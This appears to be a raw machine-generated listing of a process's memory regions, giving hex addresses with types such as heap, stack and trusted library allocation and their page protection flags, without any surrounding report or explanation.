page read and write
72401FB000
stack
page read and write
7FF511676000
unkown
page readonly
2016A113000
heap
page read and write
D574000
heap
page read and write
584D000
heap
page read and write
1A10D270000
heap
page read and write
281A1FDA000
heap
page read and write
4720000
trusted library section
page read and write
7FF9F17C0000
trusted library allocation
page read and write
2EAD000
heap
page read and write
26AC6A49000
heap
page read and write
A42000
trusted library allocation
page read and write
B80000
heap
page read and write
D581000
heap
page read and write
7FF5116E0000
unkown
page readonly
7FF5117AE000
unkown
page readonly
49BB000
heap
page read and write
7FF51178B000
unkown
page readonly
8B39955000
stack
page read and write
2CCE57F000
stack
page read and write
31D2000
heap
page read and write
3290000
unkown
page readonly
7FFA5BD1A000
unkown
page readonly
26AC1078000
heap
page read and write
7FF511945000
unkown
page readonly
FF4A000
stack
page read and write
2823943A000
trusted library allocation
page read and write
7FF5117B5000
unkown
page readonly
2F84000
heap
page read and write
DC3C000
stack
page read and write
7FFA5B4B9000
unkown
page readonly
9E9F000
heap
page read and write
D04A000
unkown
page readonly
30F0000
heap
page read and write
1A10B0D5000
heap
page read and write
281894BC000
trusted library allocation
page read and write
EE0000
heap
page read and write
504C000
stack
page read and write
FF54000
heap
page read and write
E848000
unkown
page read and write
7BED000
stack
page read and write
A1DC000
heap
page read and write
D25C000
unkown
page readonly
8250000
unkown
page readonly
28251237000
heap
page read and write
7FF511968000
unkown
page readonly
8590000
heap
page read and write
7FF9F1810000
trusted library allocation
page read and write
D1C2000
unkown
page readonly
6087000
heap
page read and write
7FF5112DA000
unkown
page readonly
26AC1B58000
heap
page read and write
7FFA594EA000
unkown
page read and write
2060E5F7000
trusted library allocation
page read and write
1C7C7450000
trusted library allocation
page read and write
463E8FE000
stack
page read and write
1C7C7430000
trusted library allocation
page read and write
815A000
unkown
page read and write
A03C000
heap
page read and write
BE4F000
stack
page read and write
1A10CBDF000
heap
page read and write
A1EF000
heap
page read and write
987B000
stack
page read and write
A187000
heap
page read and write
28251860000
trusted library allocation
page read and write
20626007000
heap
page read and write
7DF4346D0000
trusted library allocation
page execute and read and write
7FF9F178C000
trusted library allocation
page read and write
1C7AD330000
heap
page read and write
A1B9000
heap
page read and write
12FDFFE0000
trusted library allocation
page read and write
282518A0000
trusted library allocation
page read and write
81D2000
unkown
page read and write
1A56343A000
heap
page read and write
18D54326000
heap
page read and write
C9BB000
unkown
page readonly
7FF51162A000
unkown
page readonly
2ED5000
heap
page read and write
26AC6760000
trusted library allocation
page read and write
312E000
heap
page read and write
12FE07E0000
trusted library allocation
page read and write
E40000
trusted library allocation
page read and write
12FE07F0000
trusted library allocation
page read and write
A1D7000
heap
page read and write
472A000
unkown
page read and write
9D7F000
stack
page read and write
9E87000
heap
page read and write
27E3020D000
unkown
page read and write
86A6000
heap
page read and write
7FF5115EA000
unkown
page readonly
671C000
stack
page read and write
7FFA5BD67000
unkown
page readonly
9F2E000
heap
page read and write
EC42000
heap
page read and write
103D9000
heap
page read and write
5851000
heap
page read and write
A1DA000
heap
page read and write
590B000
heap
page read and write
2EC9000
heap
page read and write
7FF511285000
unkown
page readonly
7FF51128D000
unkown
page readonly
11D11FE000
stack
page read and write
9A75000
stack
page read and write
60F0000
heap
page read and write
D22C000
unkown
page readonly
7C3C000
unkown
page readonly
5962000
heap
page read and write
EE53000
unkown
page read and write
2F03000
heap
page read and write
832D000
heap
page read and write
7FF9F17E0000
trusted library allocation
page read and write
2D61000
heap
page read and write
4F8B4FE000
stack
page read and write
12FC5F60000
heap
page read and write
5C6B000
unkown
page read and write
154F76F000
stack
page read and write
83B6000
heap
page read and write
9F79000
heap
page read and write
2F27000
unkown
page read and write
7FF9F17A0000
trusted library allocation
page execute and read and write
7FF511308000
unkown
page readonly
2F7D000
heap
page read and write
D58E000
heap
page read and write
282510A0000
trusted library allocation
page read and write
E180000
unkown
page read and write
85D3000
heap
page read and write
596E000
heap
page read and write
5FC2000
heap
page read and write
D0D5000
unkown
page readonly
554000
heap
page read and write
E10E000
unkown
page read and write
7FF5118B4000
unkown
page readonly
7FFA5BCFE000
unkown
page read and write
13D5000
heap
page read and write
7FF511951000
unkown
page readonly
2F76000
unkown
page read and write
B24E000
stack
page read and write
58B3000
heap
page read and write
26AC10A7000
heap
page read and write
1A563432000
heap
page read and write
28251002000
heap
page read and write
85DB000
heap
page read and write
A0CD000
heap
page read and write
E5C000
heap
page read and write
DE7000
heap
page read and write
85F6000
heap
page read and write
282517A0000
trusted library allocation
page read and write
27E30190000
trusted library allocation
page read and write
7FF9F15DC000
trusted library allocation
page read and write
1430000
unkown
page readonly
6097000
heap
page read and write
4720000
unkown
page read and write
F51F6FB000
stack
page read and write
D249000
unkown
page readonly
10E0F000
stack
page read and write
EC42000
heap
page read and write
5C55000
unkown
page read and write
7FF511694000
unkown
page readonly
CF9A000
unkown
page readonly
EE14000
unkown
page read and write
26AC6770000
trusted library allocation
page read and write
28238F00000
trusted library allocation
page read and write
12FE0190000
trusted library allocation
page read and write
9E00000
heap
page read and write
1127000
heap
page read and write
12FE08C0000
trusted library allocation
page read and write
18D54335000
heap
page read and write
7FF51130A000
unkown
page readonly
281A1410000
trusted library allocation
page read and write
3188000
stack
page read and write
9E52000
heap
page read and write
D564000
heap
page read and write
48A1000
unkown
page read and write
31CC000
heap
page read and write
7FF5114E7000
unkown
page readonly
D515000
trusted library allocation
page read and write
281A1FB0000
heap
page read and write
5BB6000
unkown
page read and write
7FFA5B56D000
unkown
page write copy
2E90000
heap
page read and write
28251780000
trusted library allocation
page read and write
2EEC000
unkown
page read and write
8188000
unkown
page read and write
E94B000
stack
page read and write
84B0000
heap
page read and write
8599000
heap
page read and write
7FF511537000
unkown
page readonly
12FE0830000
trusted library allocation
page read and write
2DEB000
trusted library allocation
page execute and read and write
CEF1000
unkown
page readonly
28238FCB000
trusted library allocation
page read and write
E21B000
stack
page read and write
9ED1000
heap
page read and write
8517000
heap
page read and write
18D55010000
trusted library allocation
page read and write
27E3026B000
heap
page read and write
103D9000
heap
page read and write
4710000
unkown
page read and write
7FF9F17F0000
trusted library allocation
page read and write
5962000
heap
page read and write
588D000
heap
page read and write
D6BB000
stack
page read and write
1C7C72B1000
heap
page read and write
8368000
heap
page read and write
26D1DFE000
stack
page read and write
A50C000
stack
page read and write
103DA000
heap
page read and write
F51FF79000
stack
page read and write
7FF511285000
unkown
page readonly
6EF5000
stack
page read and write
7FF5118E1000
unkown
page readonly
1A10B090000
heap
page read and write
8538000
heap
page read and write
7FF5114EC000
unkown
page readonly
2BF0000
unkown
page readonly
23394EF0000
heap
page read and write
B748000
stack
page read and write
DE70000
trusted library allocation
page read and write
9F73000
heap
page read and write
7FF5118AF000
unkown
page readonly
C93C000
stack
page read and write
FFDF000
heap
page read and write
83D3000
heap
page read and write
854B000
heap
page read and write
2840000
heap
page read and write
A089000
heap
page read and write
28189090000
trusted library allocation
page read and write
85D5000
heap
page read and write
8454000
heap
page read and write
8458000
heap
page read and write
7FF5119DA000
unkown
page readonly
7FF5112F0000
unkown
page readonly
7FF9F18F0000
trusted library allocation
page read and write
1C7C7450000
trusted library allocation
page read and write
BECB000
stack
page read and write
C78B000
stack
page read and write
E552000
unkown
page read and write
7D47000
unkown
page readonly
F51F9FB000
stack
page read and write
7B6D000
stack
page read and write
595B000
heap
page read and write
7FF511957000
unkown
page readonly
E660000
unkown
page read and write
1A563540000
heap
page read and write
32C0000
unkown
page read and write
E0C000
heap
page read and write
E548000
unkown
page read and write
1C7C72B1000
heap
page read and write
A060000
heap
page read and write
103EF000
heap
page read and write
B40000
trusted library allocation
page read and write
7FF9F17B0000
trusted library allocation
page read and write
A1A6000
heap
page read and write
A022000
heap
page read and write
281A1430000
trusted library allocation
page read and write
1C7BF100000
trusted library allocation
page read and write
7FF511AA6000
unkown
page readonly
2060BF70000
unkown
page readonly
85AD000
heap
page read and write
85DE000
heap
page read and write
A1D3000
heap
page read and write
4AF8000
heap
page read and write
3030000
unkown
page read and write
7FF511870000
unkown
page readonly
A022000
heap
page read and write
7FF9F1830000
trusted library allocation
page read and write
4880000
trusted library allocation
page read and write
D58F000
heap
page read and write
7FF51148C000
unkown
page readonly
D8BC000
stack
page read and write
1E4A91BD000
heap
page read and write
602F000
heap
page read and write
9EB9000
heap
page read and write
A1CE000
heap
page read and write
2F27000
unkown
page read and write
7FF511A21000
unkown
page readonly
12FE0870000
trusted library allocation
page read and write
5520000
trusted library allocation
page read and write
8309000
heap
page read and write
A0A6000
heap
page read and write
60E4000
heap
page read and write
7C8E000
unkown
page readonly
589C000
heap
page read and write
4998000
heap
page read and write
7FF9F17E0000
trusted library allocation
page read and write
5886000
heap
page read and write
2060C0E4000
heap
page read and write
7FFA5B58A000
unkown
page readonly
26AC6800000
trusted library allocation
page read and write
5902000
heap
page read and write
856B000
heap
page read and write
7DF40BFA0000
trusted library allocation
page execute and read and write
8373000
heap
page read and write
A19E000
heap
page read and write
281A1FB0000
heap
page read and write
A02A000
heap
page read and write
A097000
heap
page read and write
E08E000
stack
page read and write
12FE0930000
trusted library allocation
page read and write
817E000
unkown
page read and write
4C6B000
stack
page read and write
9EE5000
heap
page read and write
463E97E000
stack
page read and write
7E6C000
stack
page read and write
5B78000
stack
page read and write
7FF9F1850000
trusted library allocation
page read and write
D599000
heap
page read and write
2EEC000
unkown
page read and write
D9C0000
heap
page read and write
28187356000
heap
page read and write
281990C0000
trusted library allocation
page read and write
87BD000
stack
page read and write
28187530000
heap
page read and write
D233000
unkown
page readonly
18D5433C000
heap
page read and write
7FF5112BD000
unkown
page readonly
1A10CC70000
heap
page read and write
3124000
heap
page read and write
5BF9000
unkown
page read and write
4D00000
unkown
page read and write
1C7C7430000
trusted library allocation
page read and write
58CA000
heap
page read and write
D0D5000
unkown
page readonly
2060E180000
trusted library allocation
page read and write
10E8B000
unkown
page read and write
590B000
heap
page read and write
7FF9F1920000
trusted library allocation
page read and write
819D000
unkown
page read and write
7FF511870000
unkown
page readonly
2C10000
unkown
page readonly
28251070000
trusted library allocation
page read and write
1A56343F000
heap
page read and write
1230000
unkown
page readonly
7FF511A55000
unkown
page readonly
7FF5117CA000
unkown
page readonly
8B39DFF000
stack
page read and write
8373000
heap
page read and write
8525000
heap
page read and write
CF2E000
unkown
page readonly
2BF0000
unkown
page readonly
2060C160000
heap
page read and write
596E000
heap
page read and write
9F04000
heap
page read and write
1A56343A000
heap
page read and write
A1DA000
heap
page read and write
7FF9F17F9000
trusted library allocation
page read and write
8651000
heap
page read and write
31CF000
heap
page read and write
9FD4000
heap
page read and write
7FF5118D4000
unkown
page readonly
E121000
unkown
page read and write
7FF5118E8000
unkown
page readonly
1C7C7210000
heap
page read and write
28189090000
trusted library allocation
page read and write
8177000
unkown
page read and write
8590000
heap
page read and write
7FF5114AC000
unkown
page readonly
B04B000
stack
page read and write
28251080000
trusted library allocation
page read and write
28251262000
heap
page read and write
A1B9000
heap
page read and write
E28B000
stack
page read and write
2E90000
heap
page read and write
281874B0000
heap
page readonly
861B000
heap
page read and write
1A54AD80000
heap
page readonly
281A1400000
trusted library allocation
page read and write
18D54FB0000
trusted library allocation
page read and write
66E0000
heap
page read and write
84E9000
heap
page read and write
B24E000
stack
page read and write
D510000
trusted library allocation
page read and write
832F000
heap
page read and write
7FF9F1840000
trusted library allocation
page read and write
6087000
heap
page read and write
596E000
heap
page read and write
108E9000
heap
page read and write
28251071000
trusted library allocation
page read and write
A0C7000
heap
page read and write
7FF9F15EC000
trusted library allocation
page read and write
671C000
stack
page read and write
86A1000
heap
page read and write
400000
remote allocation
page execute and read and write
12FE0800000
trusted library allocation
page read and write
8602000
heap
page read and write
2F85000
unkown
page read and write
2F84000
heap
page read and write
A09B000
heap
page read and write
8633000
heap
page read and write
3290000
unkown
page readonly
D597000
heap
page read and write
1C7AFEF8000
trusted library allocation
page read and write
8343000
heap
page read and write
28251820000
trusted library allocation
page read and write
4AF8000
heap
page read and write
85E9000
heap
page read and write
12FE07C0000
trusted library allocation
page read and write
7FF9F1890000
trusted library allocation
page read and write
7FF5112CD000
unkown
page readonly
A1F7000
heap
page read and write
A1E0000
heap
page read and write
7FF511694000
unkown
page readonly
52B4000
unkown
page read and write
7FF51131E000
unkown
page readonly
108E5000
heap
page read and write
4993000
heap
page read and write
281A2015000
heap
page read and write
9C5000
stack
page read and write
2D8E000
stack
page read and write
554000
heap
page read and write
BFCE000
stack
page read and write
7FF51198E000
unkown
page readonly
12FE07C0000
trusted library allocation
page read and write
A088000
heap
page read and write
7FF51177D000
unkown
page readonly
CA72000
unkown
page readonly
A194000
heap
page read and write
26D21FB000
stack
page read and write
7FF51195E000
unkown
page readonly
2F76000
heap
page read and write
60F0000
heap
page read and write
281896FE000
trusted library allocation
page read and write
D4D000
stack
page read and write
7ED0000
unkown
page read and write
2C89000
stack
page read and write
60F8000
heap
page read and write
846C000
heap
page read and write
7FF5119C6000
unkown
page readonly
7FF5114CC000
unkown
page readonly
49BB000
heap
page read and write
86A1000
heap
page read and write
7D6E000
stack
page read and write
2810000
heap
page read and write
4B23000
heap
page read and write
2E91000
unkown
page read and write
9E83000
heap
page read and write
D17C000
unkown
page readonly
2926000
trusted library allocation
page read and write
7FF5112BB000
unkown
page readonly
596E000
heap
page read and write
9F06000
heap
page read and write
7330000
trusted library allocation
page read and write
5188000
stack
page read and write
82F5000
heap
page read and write
8335000
heap
page read and write
7FF511858000
unkown
page readonly
5F20000
heap
page read and write
281890D5000
trusted library allocation
page read and write
D0B5000
unkown
page readonly
F60000
heap
page read and write
2840000
heap
page read and write
C7B8000
stack
page read and write
6993000
unkown
page read and write
4740000
trusted library section
page read and write
9EA8000
heap
page read and write
A43C000
stack
page read and write
7FFA594F3000
unkown
page readonly
A06B000
heap
page read and write
7FF51196F000
unkown
page readonly
136A000
heap
page read and write
8692000
heap
page read and write
5120000
unkown
page read and write
26AC6751000
trusted library allocation
page read and write
7FFA5BB60000
unkown
page readonly
282510B0000
trusted library allocation
page read and write
A4BC000
stack
page read and write
4710000
unkown
page read and write
48C0000
unkown
page read and write
510C000
stack
page read and write
6FF9000
stack
page read and write
9EB0000
heap
page read and write
A0C4000
heap
page read and write
4A7A000
stack
page read and write
588D000
heap
page read and write
D70000
heap
page read and write
7FF5119EE000
unkown
page readonly
7FF511598000
unkown
page readonly
9E52000
heap
page read and write
FF0000
remote allocation
page read and write
20626031000
heap
page read and write
9EFC000
heap
page read and write
84AC000
heap
page read and write
B949000
stack
page read and write
5900000
heap
page read and write
8B3A0BE000
stack
page read and write
9C7E000
stack
page read and write
DF0E000
stack
page read and write
1A563850000
trusted library allocation
page read and write
854B000
heap
page read and write
9E89000
heap
page read and write
7FF51179B000
unkown
page readonly
D9BC000
stack
page read and write
589C000
heap
page read and write
60C5000
heap
page read and write
FFDF000
heap
page read and write
7FF511962000
unkown
page readonly
8692000
heap
page read and write
5310000
unkown
page read and write
DF40000
heap
page read and write
7FF9F1890000
trusted library allocation
page read and write
88E1000
unkown
page read and write
7FF51186D000
unkown
page readonly
6680000
unkown
page read and write
281872CA000
heap
page read and write
A0B8000
heap
page read and write
4880000
unkown
page read and write
8517000
heap
page read and write
3070000
unkown
page read and write
A149000
heap
page read and write
15629413000
heap
page read and write
D22C000
unkown
page readonly
7FF9F17C0000
trusted library allocation
page execute and read and write
2EEF000
unkown
page read and write
D1F5000
unkown
page readonly
A1D7000
heap
page read and write
86FA000
system
page read and write
57E2000
heap
page read and write
7FF9F177D000
trusted library allocation
page read and write
AABF000
stack
page read and write
2D08000
stack
page read and write
E888000
unkown
page read and write
26AC1A02000
heap
page read and write
7FF5112AE000
unkown
page readonly
26AC1090000
heap
page read and write
28250FD2000
heap
page read and write
B3CA000
stack
page read and write
108CF000
stack
page read and write
A10000
heap
page read and write
A03A000
heap
page read and write
5FD1000
heap
page read and write
5487000
stack
page read and write
8698000
heap
page read and write
7FF9F15B0000
trusted library allocation
page read and write
1A56344F000
heap
page read and write
E00B000
stack
page read and write
EE0000
heap
page read and write
4A7A000
stack
page read and write
1100000
heap
page read and write
23394F00000
heap
page read and write
4AFC000
stack
page read and write
337A000
stack
page read and write
A1D7000
heap
page read and write
BDC000
trusted library allocation
page read and write
E39F000
unkown
page read and write
282517CC000
trusted library allocation
page read and write
F618000
stack
page read and write
7FF9F1920000
trusted library allocation
page read and write
12FE01A1000
trusted library allocation
page read and write
2F03000
heap
page read and write
138B000
heap
page read and write
27E30602000
heap
page read and write
86FA000
system
page read and write
26AC673E000
trusted library allocation
page read and write
A1A9000
heap
page read and write
E8A000
heap
page read and write
35C0000
heap
page read and write
CA6B000
unkown
page readonly
103A2000
heap
page read and write
D9C0000
heap
page read and write
EE96000
unkown
page read and write
7FF51130E000
unkown
page readonly
23395108000
heap
page read and write
B9CA000
stack
page read and write
9F2F000
heap
page read and write
9F69000
heap
page read and write
DB8000
heap
page read and write
12FB000
stack
page read and write
CF47000
unkown
page readonly
74C0000
trusted library allocation
page read and write
7FF511692000
unkown
page readonly
E6EE000
unkown
page read and write
E199000
unkown
page read and write
A0D7000
heap
page read and write
9F75000
heap
page read and write
EF14000
unkown
page read and write
610B000
heap
page read and write
863A000
heap
page read and write
8590000
heap
page read and write
7FF5115AF000
unkown
page readonly
E0D0000
unkown
page read and write
D1B9000
unkown
page readonly
45A000
heap
page read and write
7FF511ABD000
unkown
page readonly
2D26000
stack
page read and write
281A2015000
heap
page read and write
7FF9F1772000
trusted library allocation
page read and write
12FC600E000
heap
page read and write
3A46000
heap
page read and write
103F1000
heap
page read and write
7BD5000
unkown
page readonly
BE4F000
stack
page read and write
D939000
stack
page read and write
1A563520000
trusted library allocation
page read and write
58A7000
heap
page read and write
EC42000
heap
page read and write
D4F0000
trusted library allocation
page read and write
4890000
unkown
page read and write
26AC6840000
trusted library allocation
page read and write
3460000
unkown
page readonly
AC40000
unkown
page read and write
A19E000
heap
page read and write
7C3C000
unkown
page readonly
3070000
unkown
page read and write
12FE07D0000
trusted library allocation
page read and write
7FF511981000
unkown
page readonly
206260C0000
trusted library allocation
page read and write
5831000
heap
page read and write
D9BC000
stack
page read and write
1C7AEF90000
heap
page execute and read and write
312B000
heap
page read and write
281A202E000
heap
page read and write
49BB000
heap
page read and write
2DAF000
stack
page read and write
607D000
heap
page read and write
9EB3000
heap
page read and write
7D55000
unkown
page readonly
EE96000
unkown
page read and write
FD1000
heap
page read and write
BD0000
unkown
page readonly
7480000
trusted library allocation
page read and write
282393E2000
trusted library allocation
page read and write
E68000
heap
page read and write
3193000
heap
page read and write
282518B0000
trusted library allocation
page read and write
83F7000
heap
page read and write
7FF51155B000
unkown
page readonly
83BA000
heap
page read and write
A03C000
heap
page read and write
1A563850000
trusted library allocation
page read and write
7FF9F1742000
trusted library allocation
page read and write
2060E5D0000
trusted library allocation
page read and write
7FF9F1800000
trusted library allocation
page read and write
78AD000
unkown
page readonly
F90000
trusted library section
page readonly
5981000
heap
page read and write
D183000
unkown
page readonly
7FF9F16B6000
trusted library allocation
page execute and read and write
F04000
heap
page read and write
7FF511598000
unkown
page readonly
D70000
heap
page read and write
7FF511AB6000
unkown
page readonly
E381000
unkown
page read and write
5F20000
heap
page read and write
EF14000
unkown
page read and write
1A54B26A000
trusted library allocation
page read and write
2CCE1FF000
stack
page read and write
867D000
heap
page read and write
D1A3000
unkown
page readonly
9E9F000
heap
page read and write
2CCE4FE000
stack
page read and write
A20000
unkown
page read and write
9C6000
stack
page read and write
2F27000
unkown
page read and write
597B000
heap
page read and write
31D0000
heap
page read and write
D56A000
heap
page read and write
85A9000
heap
page read and write
318F000
stack
page read and write
7FF5118A8000
unkown
page readonly
1E4A71F3000
heap
page read and write
D557000
heap
page read and write
7FF511496000
unkown
page readonly
8590000
heap
page read and write
A096000
heap
page read and write
DFD0000
heap
page read and write
A1EA000
heap
page read and write
28251090000
trusted library allocation
page read and write
1180F000
stack
page read and write
5C47000
stack
page read and write
1A10D541000
heap
page read and write
26AC6AEB000
heap
page read and write
7FF5119E1000
unkown
page readonly
12FE0245000
heap
page read and write
FF9D000
heap
page read and write
5BF9000
unkown
page read and write
8362000
heap
page read and write
7FF5114AC000
unkown
page readonly
26AC6890000
trusted library allocation
page read and write
5FC2000
heap
page read and write
7FFA594ED000
unkown
page write copy
A08D000
heap
page read and write
7FF51130A000
unkown
page readonly
8B3A33E000
stack
page read and write
7FF51187B000
unkown
page readonly
7FF9F18E0000
trusted library allocation
page read and write
CDAD000
unkown
page readonly
E83F000
unkown
page read and write
E51B000
stack
page read and write
D63E000
stack
page read and write
2F6F000
stack
page read and write
2F76000
unkown
page read and write
FDC5977000
stack
page read and write
46F0000
unkown
page read and write
2F84000
heap
page read and write
DF8A000
heap
page read and write
28251830000
trusted library allocation
page read and write
E199000
unkown
page read and write
7FFA5B573000
unkown
page readonly
28236DE0000
heap
page read and write
282389B0000
heap
page execute and read and write
B050000
unkown
page readonly
7FF511951000
unkown
page readonly
B40000
trusted library allocation
page read and write
9FF9000
heap
page read and write
F30000
unkown
page read and write
8333000
heap
page read and write
1490000
heap
page read and write
EE0000
heap
page read and write
7FF5112A0000
unkown
page readonly
852A000
heap
page read and write
281A202C000
heap
page read and write
7FFA59350000
unkown
page readonly
2C10000
unkown
page readonly
2F84000
heap
page read and write
281A1400000
trusted library allocation
page read and write
85D3000
heap
page read and write
D7BB000
stack
page read and write
D50000
heap
page read and write
7FF5112AE000
unkown
page readonly
5802000
heap
page read and write
28238F20000
trusted library allocation
page read and write
8571000
heap
page read and write
7572000
unkown
page readonly
A193000
heap
page read and write
9F36000
heap
page read and write
8375000
heap
page read and write
FF1A000
stack
page read and write
7FF9F18C0000
trusted library allocation
page read and write
26AC1029000
heap
page read and write
A080000
heap
page read and write
28251080000
trusted library allocation
page read and write
2C89000
stack
page read and write
5F59000
heap
page read and write
12FE0880000
trusted library allocation
page read and write
D58E000
heap
page read and write
4AA0000
unkown
page write copy
A0B8000
heap
page read and write
A0A7000
heap
page read and write
9EE6000
heap
page read and write
7FFA5B565000
unkown
page read and write
6100000
heap
page read and write
337A000
stack
page read and write
7D40000
unkown
page readonly
315D000
heap
page read and write
26D1D7E000
stack
page read and write
D1A5000
unkown
page readonly
1A563504000
trusted library allocation
page read and write
D597000
heap
page read and write
28251770000
trusted library allocation
page read and write
328D000
stack
page read and write
15629E02000
trusted library allocation
page read and write
D04A000
unkown
page readonly
7FF9F15DD000
trusted library allocation
page execute and read and write
7FF511676000
unkown
page readonly
26AC10FA000
heap
page read and write
E30000
heap
page read and write
58FE000
heap
page read and write
69D0000
unkown
page read and write
7FF9F1930000
trusted library allocation
page read and write
93F9000
stack
page read and write
4720000
trusted library section
page read and write
28238F20000
trusted library allocation
page read and write
CA6E000
unkown
page readonly
E88C000
unkown
page read and write
FF93000
heap
page read and write
7FF511988000
unkown
page readonly
108E9000
heap
page read and write
12FE08D0000
trusted library allocation
page read and write
1C7AD110000
unkown
page readonly
7FF51184C000
unkown
page readonly
2DE0000
stack
page readonly
12FE08C0000
trusted library allocation
page read and write
7FF511318000
unkown
page readonly
84F4000
heap
page read and write
D564000
heap
page read and write
A1C8000
heap
page read and write
5802000
heap
page read and write
12FE07C0000
trusted library allocation
page read and write
9E00000
heap
page read and write
7FFA594EE000
unkown
page read and write
7FF511552000
unkown
page readonly
84CE000
heap
page read and write
7EE5000
unkown
page read and write
2F12000
heap
page read and write
607D000
heap
page read and write
1A10CBDF000
heap
page read and write
2061DFD5000
trusted library allocation
page read and write
2060DA85000
heap
page read and write
12FE04C0000
trusted library allocation
page read and write
E0C000
heap
page read and write
832F000
heap
page read and write
5280000
unkown
page readonly
FE0000
unkown
page readonly
3258000
stack
page read and write
7FF5115D2000
unkown
page readonly
12FE07C0000
trusted library allocation
page read and write
83A0000
heap
page read and write
1A10D0A5000
heap
page read and write
7FFA5954F000
unkown
page readonly
F34000
heap
page read and write
806B000
stack
page read and write
4AFB000
heap
page read and write
49A0000
heap
page read and write
2ED8000
stack
page read and write
7FF5117B5000
unkown
page readonly
282490C6000
trusted library allocation
page read and write
883B000
stack
page read and write
103D4000
heap
page read and write
84DD000
heap
page read and write
31B8000
heap
page read and write
32C0000
unkown
page read and write
7FF5114C3000
unkown
page readonly
32F0000
unkown
page readonly
9F7D000
heap
page read and write
7D1E000
unkown
page readonly
85E4000
heap
page read and write
7AD4000
unkown
page readonly
A1B9000
heap
page read and write
26D1AFE000
stack
page read and write
51A0000
unkown
page read and write
821D000
unkown
page read and write
756E000
unkown
page readonly
AB38000
stack
page read and write
5AD0000
heap
page read and write
861A000
heap
page read and write
540E000
stack
page read and write
2F12000
heap
page read and write
7FF5118E1000
unkown
page readonly
8164000
unkown
page read and write
2E8E000
stack
page read and write
7FFA594F0000
unkown
page read and write
847B000
heap
page read and write
C83F000
stack
page read and write
2016A06E000
heap
page read and write
B4CE000
stack
page read and write
7BD5000
unkown
page readonly
A4B9000
stack
page read and write
59B2000
heap
page read and write
81B0000
unkown
page read and write
8464000
heap
page read and write
5410000
unkown
page readonly
85E4000
heap
page read and write
7FF9F1860000
trusted library allocation
page read and write
1380000
heap
page read and write
1A10B0F6000
heap
page read and write
8620000
heap
page read and write
18D54339000
heap
page read and write
9D7F000
stack
page read and write
23395102000
heap
page read and write
EA6000
heap
page read and write
1A10D04D000
heap
page read and write
281A201A000
heap
page read and write
1550B8D000
stack
page read and write
567C000
stack
page read and write
CA6E000
unkown
page readonly
4AFC000
heap
page read and write
723F5C9000
stack
page read and write
82F8000
heap
page read and write
7FF9F1880000
trusted library allocation
page read and write
7FFA59439000
unkown
page readonly
A3F8BFB000
stack
page read and write
7FF511988000
unkown
page readonly
28237003000
heap
page read and write
155003B000
stack
page read and write
12FE0190000
trusted library allocation
page read and write
7FF511A36000
unkown
page readonly
26AC6820000
trusted library allocation
page read and write
A0A1000
heap
page read and write
A5BE000
stack
page read and write
78AD000
unkown
page readonly
85E4000
heap
page read and write
2CA7000
stack
page read and write
4901000
heap
page read and write
7FF511758000
unkown
page readonly
A1D3000
heap
page read and write
7FF9F17D0000
trusted library allocation
page read and write
7FF51173D000
unkown
page readonly
7DF419781000
trusted library allocation
page execute read
D16E000
unkown
page readonly
103F6000
heap
page read and write
588D000
heap
page read and write
4C6B000
stack
page read and write
A41000
heap
page read and write
206260C0000
trusted library allocation
page read and write
66F0000
heap
page read and write
2E91000
unkown
page read and write
7FF9F17F0000
trusted library allocation
page read and write
4700000
unkown
page read and write
603D000
heap
page read and write
819D000
unkown
page read and write
7FF9F16A6000
trusted library allocation
page execute and read and write
7FF511962000
unkown
page readonly
2F04000
trusted library allocation
page read and write
FE0000
unkown
page readonly
1E4A9360000
heap
page read and write
E3B4000
unkown
page read and write
28239656000
trusted library allocation
page read and write
5975000
heap
page read and write
7FF511A11000
unkown
page readonly
554000
heap
page read and write
9F7D000
heap
page read and write
28251900000
trusted library allocation
page read and write
A179000
heap
page read and write
CFB000
stack
page read and write
85DB000
heap
page read and write
281A1400000
trusted library allocation
page read and write
281A1410000
trusted library allocation
page read and write
10E0F000
stack
page read and write
FDC5CFB000
stack
page read and write
1198E000
stack
page read and write
830B000
heap
page read and write
D50000
heap
page read and write
7FF511574000
unkown
page readonly
85AB000
heap
page read and write
12FE0190000
trusted library allocation
page read and write
99FC000
stack
page read and write
1A54B6E2000
trusted library allocation
page read and write
82F2000
heap
page read and write
D73B000
stack
page read and write
10B0F000
stack
page read and write
7FF5116C5000
unkown
page readonly
12FC7F4B000
trusted library allocation
page read and write
5BD3000
unkown
page read and write
15629400000
heap
page read and write
338A000
stack
page read and write
DCBC000
stack
page read and write
839F000
heap
page read and write
316E000
heap
page read and write
E1F6000
unkown
page read and write
31D2000
heap
page read and write
26D217E000
stack
page read and write
58C5000
heap
page read and write
1C7AEFC7000
heap
page execute and read and write
1025000
heap
page read and write
1C7AFEEF000
trusted library allocation
page read and write
60F8000
heap
page read and write
96FD000
stack
page read and write
3460000
unkown
page readonly
85F6000
heap
page read and write
2BD0000
unkown
page read and write
7D49000
unkown
page readonly
10A82000
heap
page read and write
FDC5B7E000
stack
page read and write
2A93000
heap
page read and write
28236E50000
heap
page read and write
12FE07C0000
trusted library allocation
page read and write
26AC6AF9000
heap
page read and write
E20B000
stack
page read and write
D59D000
heap
page read and write
D552000
heap
page read and write
A0AB000
heap
page read and write
1A563880000
heap
page read and write
27E30300000
trusted library allocation
page read and write
8177000
unkown
page read and write
2843000
heap
page read and write
108E5000
heap
page read and write
868E000
heap
page read and write
7F91000
unkown
page read and write
AABF000
stack
page read and write
7FF51163D000
unkown
page readonly
861B000
heap
page read and write
4F8AF09000
stack
page read and write
4978000
stack
page read and write
83EA000
heap
page read and write
108E9000
heap
page read and write
1C7C7250000
heap
page read and write
10C0F000
stack
page read and write
FFE1000
heap
page read and write
554000
heap
page read and write
7FF9F15A0000
trusted library allocation
page read and write
9FC9000
heap
page read and write
59C5000
heap
page read and write
2F5C000
stack
page read and write
103A7000
heap
page read and write
7FFA5BCFD000
unkown
page write copy
DE7000
heap
page read and write
5BCE000
unkown
page read and write
7FF9F18B0000
trusted library allocation
page read and write
8587000
heap
page read and write
7FFA594EC000
unkown
page read and write
3197000
heap
page read and write
863F000
heap
page read and write
D272000
unkown
page readonly
3023000
trusted library allocation
page read and write
28250FEE000
heap
page read and write
7C65000
unkown
page readonly
1131000
heap
page read and write
A149000
heap
page read and write
26AC6750000
trusted library allocation
page read and write
74D0000
trusted library allocation
page read and write
96FD000
stack
page read and write
8362000
heap
page read and write
12FC83EF000
trusted library allocation
page read and write
20626210000
trusted library allocation
page read and write
1230000
unkown
page readonly
7FF511988000
unkown
page readonly
7CF5000
unkown
page readonly
FFA7000
heap
page read and write
817E000
unkown
page read and write
86A1000
heap
page read and write
CF18000
unkown
page readonly
9E89000
heap
page read and write
7EBA000
unkown
page read and write
